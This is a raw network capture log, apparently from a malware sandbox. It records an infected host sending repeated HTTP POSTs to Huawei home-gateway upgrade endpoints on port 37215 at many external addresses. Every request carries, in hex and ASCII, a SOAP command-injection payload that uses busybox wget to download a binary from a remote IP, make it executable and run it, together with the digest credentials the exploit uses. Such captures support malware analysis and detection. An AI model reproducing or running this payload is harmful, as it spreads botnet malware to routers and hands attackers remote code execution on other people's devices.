                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1762192.168.2.1540152197.164.109.11837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463413000 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1763192.168.2.1549800197.177.3.22237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463445902 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1764192.168.2.1559832197.66.79.17337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463445902 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1765192.168.2.1551900197.244.59.2137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463458061 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1766192.168.2.1542152197.122.235.12637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463464975 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1767192.168.2.1540326197.225.163.23337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463486910 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1768192.168.2.1553224197.168.81.24837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.464703083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1769192.168.2.1552118197.122.111.3737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.464732885 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1770192.168.2.1538330197.59.235.8737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.464770079 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1771192.168.2.1550738197.123.94.1837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.464786053 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
